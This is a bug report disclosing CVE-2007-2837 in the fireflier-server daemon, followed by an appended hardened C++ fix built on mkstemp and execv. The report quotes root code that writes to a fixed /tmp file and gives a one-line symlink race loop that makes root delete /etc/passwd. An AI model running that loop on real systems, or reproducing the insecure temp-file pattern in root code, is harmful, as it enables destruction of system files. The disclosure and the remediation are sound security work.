Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

Security issue: CVE-2007-2837.

The server, fireflierd, runs with root privileges and the code contains this gem which I think speaks for itself:

string getRule(unsigned int chainid, int rulenum)
{
  ...
  cmd="rm -f /tmp/fireflier.rules && touch /tmp/fireflier.rules && chmod 0700 /tmp/fireflier.rules && ";
  cmd+=IPTABLES_SAVE;
  cmd+=" > /tmp/fireflier.rules";
  if(DEBUG) cout<<"cmd: "<<cmd<<endl;
  system(cmd.c_str());
  ...
}

This contains several race conditions, and can be trivially exploited to remove any file on the server as root. For example run this as a user inside GNU screen:

[EMAIL PROTECTED]:~$ while true; do ln -s /etc/passwd /tmp/fireflier.rules; done

Wait for a root user to fetch/update/delete a rule using one of the available clients, and the /etc/passwd file will be removed.

Steve
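The bug class above is a temp-file race: the daemon uses a fixed, world-known path, removes and recreates it in separate shell steps, and the final `>` redirection follows whatever is sitting at that name by the time it runs. The following is an added example (not fireflier's code, and not part of the bug report) of the shape a fix takes: the output file is created by mkstemp() with an unpredictable name, O_EXCL semantics and mode 0600, the command is run with execv() instead of a shell, and the daemon reads back through the descriptor it created rather than reopening by path, so there is no window between check and use. Function names, the /tmp/fireflier.XXXXXX template and the use of /bin/echo as a stand-in for iptables-save are all assumptions of this example.

```cpp
// Added example: hardened capture of a command's output into a private
// temp file, for a daemon running as root. Names are illustrative.
#include <cstdlib>
#include <string>
#include <vector>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

// Runs argv[0] directly (no shell) with stdout redirected into a file that
// mkstemp() creates atomically (O_CREAT|O_EXCL, mode 0600). Because the name
// is random and the create is exclusive, a symlink planted at a guessed name
// is never followed, and the descriptor we keep refers to the file we made.
// Returns the open fd (positioned at end) on success, -1 on failure; pathOut
// receives the file name so the caller can unlink it when done.
int captureToPrivateTempFile(const std::vector<std::string>& argv, std::string& pathOut)
{
    pathOut.clear();
    if (argv.empty()) return -1;
    char tmpl[] = "/tmp/fireflier.XXXXXX";   // assumed template; mkstemp fills XXXXXX
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    pathOut = tmpl;

    pid_t pid = fork();
    if (pid < 0) { close(fd); unlink(tmpl); pathOut.clear(); return -1; }
    if (pid == 0) {
        // Child: point stdout at the private file, then exec without a shell.
        if (dup2(fd, STDOUT_FILENO) < 0) _exit(127);
        close(fd);
        std::vector<char*> args;
        for (const std::string& a : argv) args.push_back(const_cast<char*>(a.c_str()));
        args.push_back(nullptr);
        execv(args[0], args.data());
        _exit(127);   // only reached if execv fails
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        close(fd);
        unlink(tmpl);
        pathOut.clear();
        return -1;
    }
    return fd;   // parent keeps the descriptor; no reopen by path later
}

// Reads the whole file back through the descriptor (shared offset with the
// child, so rewind first). Avoids any second lookup of the path.
std::string readWholeFd(int fd)
{
    std::string out;
    if (lseek(fd, 0, SEEK_SET) < 0) return out;
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) out.append(buf, static_cast<size_t>(n));
    return out;
}

// Audit helper: is path a regular file (not a symlink) with owner-only mode?
// lstat() is used so a symlink is reported rather than followed.
bool isPrivateRegularFile(const std::string& path)
{
    struct stat st;
    if (lstat(path.c_str(), &st) != 0) return false;
    return S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600;
}

int main()
{
    // Stand-alone demo; the real daemon would pass its iptables-save path here.
    std::string path;
    int fd = captureToPrivateTempFile({"/bin/echo", "sample rule output"}, path);
    if (fd < 0) return 1;
    std::string body = readWholeFd(fd);
    close(fd);
    unlink(path.c_str());
    write(STDOUT_FILENO, body.c_str(), body.size());
    return 0;
}
```

If the daemon only needs the text in memory, a pipe between parent and child is simpler still and removes the /tmp file (and its permission and cleanup concerns) altogether; the temp-file form is shown here because that is the shape the vulnerable code has. Note also that the fixed-path version is unsafe even with the chmod, since the shell's `>` opens whatever the name resolves to at that instant.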